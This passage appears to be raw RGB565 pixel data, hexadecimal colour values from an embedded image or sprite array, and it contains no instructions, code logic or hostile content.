0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0x0000, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0xffff, 0xe8e4, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 